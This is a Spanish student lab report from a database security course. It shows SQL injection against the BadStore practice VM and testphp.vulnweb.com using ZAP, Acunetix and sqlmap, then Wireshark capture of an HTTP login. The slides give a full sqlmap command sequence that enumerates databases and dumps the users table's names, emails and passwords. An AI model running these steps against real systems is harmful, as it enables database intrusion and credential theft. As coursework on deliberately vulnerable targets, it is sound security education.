Ataques a bases de datos

39
ATAQUES A BASES DE DATOS Componente Práctico 1 Arnulfo Fernando Hernández Daza Seguridad en bases de datos, Universidad Nacional Abierta y a Distancia-UNAD Tauramena, Colombia

Transcript of Ataques a bases de datos

Page 1: Ataques a bases de datos

ATAQUES A BASES DE

DATOSComponente Práctico 1

Arnulfo Fernando Hernández Daza

Seguridad en bases de datos, Universidad Nacional Abierta y a Distancia-UNAD

Tauramena, Colombia

Page 2: Ataques a bases de datos

1. ATAQUE POR INYECCION DE CODIGO

SQL BASE DE DATOS BADSTORE

Lo primero que hacemos es instalar la base de datos en una máquina virtual; en

este caso utilizamos VMware.

Page 3: Ataques a bases de datos

Para vulnerar la base de datos de Badstore utilizaremos Acunetix y Zed

attack proxy. Instalamos y configuramos entonces OWASP Zed.

Page 4: Ataques a bases de datos

Configuro en mi navegador el proxy para enlazar las busquedas del

navegador con OWAS ZAP:

Page 5: Ataques a bases de datos

En la carpeta de instalacion de OWAS ZAP, busco el archivo Config, y en la linea

del hostname establesco el mismo host que configure en el proxy del navegador:

127.0.0.1

Page 6: Ataques a bases de datos

Descargamos e instalamos Acunetix para poder detectar las vulnerabilidades de

Badstore.

Page 7: Ataques a bases de datos

Procedemos a la configuración de Acunetix:

Aquí le indico a acunetix la dirección que quiero que escanee en busca de

vulnerabilidades, es este caso será la dirección de Badstore,

http://192.168.204.130/.

Page 8: Ataques a bases de datos

Y como se puede observar en la imagen siguiente, se comienza el escaneo de las

vulnerabilidades de Badstore con acunetix:

Page 9: Ataques a bases de datos

Mientras se termina el escaneo podemos probar sobre un error hallado, el cross

site scripting de la siguiente manera:

Page 10: Ataques a bases de datos

Ahora volvemos a Zed Attack y habilitamos el escaneo de badstore:

Page 11: Ataques a bases de datos

Identificamos una amenaza para atacar:

Page 12: Ataques a bases de datos

Aplico un Fuzz a la direccion vulnerable del sitio:

Page 13: Ataques a bases de datos

Configuro el Fuzz:

Page 14: Ataques a bases de datos

Podemos observar la informacion de algunos clientes:

Page 15: Ataques a bases de datos

2. ATAQUE CON INYECCIÓN DE CÓDIGO SQL A

SITIO WEB http://testphp.vulnweb.com/.

Procedemos a instalar Python:

Page 16: Ataques a bases de datos

Copiamos la carpeta de sqlmap en el disco donde

está instalado Python

Page 17: Ataques a bases de datos

Desde la ventana de símbolo de sistema accedemos a

la carpeta que contiene los archivos sqlmap y

ejecutamos el comando para obtener la información

de la base de datos del sitio de BadStore:

> color f4

> cd sqlmap

Page 18: Ataques a bases de datos

Para obtener información de la base de datos

buscamos primero una vulnerabilidad en la página

digitando el código = al final de la dirección y

observando el erros en la sintaxis de SQL.

Page 19: Ataques a bases de datos

Cuando tenemos la vulnerabilidad entonces digitamos el siguiente código

para obtener información:

Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 --dbs

Page 20: Ataques a bases de datos

Ahora buscamos informacion en la pagina. Averiguamos que base de datos utiliza

el sitio:

Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –current-db

Page 21: Ataques a bases de datos

Ahora buscaremos la información correspondiente a las tablas que muestra la

base de datos:

Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart –

tables

Page 22: Ataques a bases de datos

Ahora busquemos la informacion de las columnas de las tablas:

Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --

columns

Page 23: Ataques a bases de datos

Ahora podemos averiguar los datos de alguna columna de la tabla users, con el

siguiente codigo:

Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --

columns –T users –C name

Page 24: Ataques a bases de datos

Extraemos el contenido:

Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --

columns –T users –C name –dump

Page 25: Ataques a bases de datos

Averiguamos el correo:

Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --

columns –T users –C email –dump

Page 26: Ataques a bases de datos

Busquemos la contraseña:

Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --

columns –T users –C pass –dump

Page 27: Ataques a bases de datos

Ahora el usuario:

Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --

columns –T users –C uname –dump

Page 28: Ataques a bases de datos

Ahora hagamos una prueba con los datos obtenidos del ataque en la pagina y

verificamos que los datos obtenidos son reales:

Page 29: Ataques a bases de datos

3. ATAQUE POR SNIFFING

Para el ataque por sniffing utilizaremos el software de Wireshark.

Descargamos e instalamos en nuestro equipo el software:

Page 30: Ataques a bases de datos

Una vez instalado el software de Wireshark procedemos a configurarlo y

utilizarlo para nuestro análisis:

Page 31: Ataques a bases de datos

Abrimos el menu Capture, damos clic en opciones y seleccionanos

nuestra tarjeta de red y le damos iniciar escaneo de red:

Page 32: Ataques a bases de datos

De esta forma se incia el escaneo del trafico en la red:

Page 33: Ataques a bases de datos

Ahora accederemos a una cuenta en un sitio web sin seguridad, de tipo

http; en este caso utilizaremos una cuenta de www.directoriow.com:

Page 34: Ataques a bases de datos

Una vez logueados en el sitio con nuestros datos procedemos a usar Wireshark. Lo primero es dar clic en el botón Expression y escoger la opción HTTP – Hypertext transfer protocolo.

Page 35: Ataques a bases de datos

Dentro del menú de opciones damos clic en http.request.method.

Page 36: Ataques a bases de datos

Luego de esto buscamos la ip que destino que corresponde al sitio

de www.directorio.com, que en este caso es 95.211.231.44.

Page 37: Ataques a bases de datos

Una vez identificada la ip podermos filtrar todo el trafico

correspondiente a este sitio con el comando ip.addr==95.211.231.44.

Page 38: Ataques a bases de datos

Cuando tengamos filtrado el trafico del sitio, buscamos la línea que contiene el login? del

usuario que utilizamos y en la ventana inferior en la opción de HTML Form URL Encoded

podemos encontrar la información de usurario y contraseña que estamos buscando.

Page 39: Ataques a bases de datos

REFERENCIAS

Recuperado:

https://www.youtube.com/watch?v=-C9TEBIfyrg

Recuperado:

http://rootear.com/seguridad/utilizando-sqlma

Recuperado:

https://www.youtube.com/watch?v=OPhqJTBGZsw

Recuperado:

http://www.hacktimes.com/sql_injection_con_sqlmap/